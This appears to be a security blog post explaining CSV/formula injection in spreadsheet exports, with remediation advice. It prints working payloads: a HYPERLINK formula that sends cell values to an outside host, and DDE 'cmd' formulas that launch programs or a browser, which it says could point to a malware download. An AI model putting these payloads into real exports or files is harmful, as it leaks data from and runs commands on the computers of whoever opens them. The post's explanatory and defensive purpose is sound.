CSV Macro Injection

CSV Macro Injection : It’s rather a trick to abuse the functionality…

Application security is quite a tricky domain. Just imagine for all those years when you thought something as a functionality of the application and suddenly it turns out to be a vulnerability which can be exploited to take down your system completely. CSV Macro Injection/Formula Injection is also one of those. We will look into it in detail that how a simple and such useful feature can become vulnerable and abuse the complete CIA triangle.

We can’t deny the usefulness of spreadsheets in our daily IT/Non-IT life. If you have bulk data and you want it to edit, sort, represent, compute(we really can do more stuffs than this as well) repetitively the excel and CSV is the correct file format for you. In computing, a comma-separated values (CSV) file stores tabular data (numbers and text) in plain text. Each line of the file is a data record.

Each record consists of one or more fields, separated by commas. The use of the comma as a field separator is the source of the name for this file format. The CSV file format is not standard. The basic idea of separating fields with a comma is clear, but that idea complicates when the field data may also contain commas or even line-breaks. CSV implementations may not handle such field data, or they may use quotation marks to surround the field. Quotation does not solve everything: some fields may need embedded quotation marks, so a CSV implementation may include escape characters or escape sequences.

When it is a vulnerability !

Finding this vulnerability is comparatively easy, many web application have a functionality where users can download/export the desired data in a .csv or .xlsx format. The spreadsheet may contain input from many resources which may be not safe. At first glance it may look like a nice feature but it can be quite risky because any cells starting with the ‘=’ character will be interpreted by the spreadsheet software as formula. This formula may be converted into a tool to call any function or perform the desired task on victim’s computer. For example in any e-commerce website if a user gives his address as the following value.

=HYPERLINK("https://iosec.in?leak="&C1&D1,"Error: May be here !!")

Now the vendor tries to download a spreadsheet with the list of cutomers along with addresses and other details. The particular cell value will look something like below.

Once the vendor admin clicks on the cell, the value of C1 and D1 cell will be sent to https://iosec.in. This scenario may be very useful when the spreadsheet contains any sensitive information.

Why it happens ?

This vulnerability occurs due to the concept of Dynamic Data exchange(DDE). DDE is a protocol for inter-process communication under windows. MS-Excel, LibreOffice and Apache OpenOffice supports this protocol. The DDE function is in the following format:

=DDE(server; file; item; mode)

So by using some malicious arguments, it is possible to remotely execute applications or commands on the victim’s computer of whoever opens the document.

What if there is nothing sensitive in the spreadsheet !!!

Formulae written in many manners not only about leaking the spreadsheet values but also executing any arbitrary action on victim’s computer. The nature and functionality of these payloads completely depends upon the imagination and purpose of the attacker.

The most basic payload by which I test the application is,

=cmd|' /C calc'!A0

Upon opening the excel/CSV it triggers the calculater of windows machine, but before that Microsoft gives a little warning regarding the trigger. Although if the user is downloading from his own website or from any reputed application definitely he will click on trusted(Kind of interesting).

More payloads

=cmd|'/c start netstat'!A0
=cmd|'/C start iexplore http://www.etchacked.in'!A0

The attacker can give any malware download link in above payload.

=cmd|'/c start ping -t'!A0

Let me know if you come across any other intersting idea of payloads.

How to fix !!

Following symbols can trigger formula interpretation in Microsoft Excel:

  • Equals  to (“=”)
  • Plus (“+”)
  • Minus (“-“)
  • At (“@”)

When generating spreadsheets, fields that begin with any of the above symbols should be prepended by a single quote or apostrophe (‘) character. Microsoft Excel will preserve data integrity by hiding this character when rendering the spreadsheet.

Lastly, as a best security practice measure, consider stripping all trailling white spaces where possible, and limiting all client-supplied data to alpha-numeric characters.

Disclaimer:- This post is only for the learning purposes and use it with the permission of the admin of the application.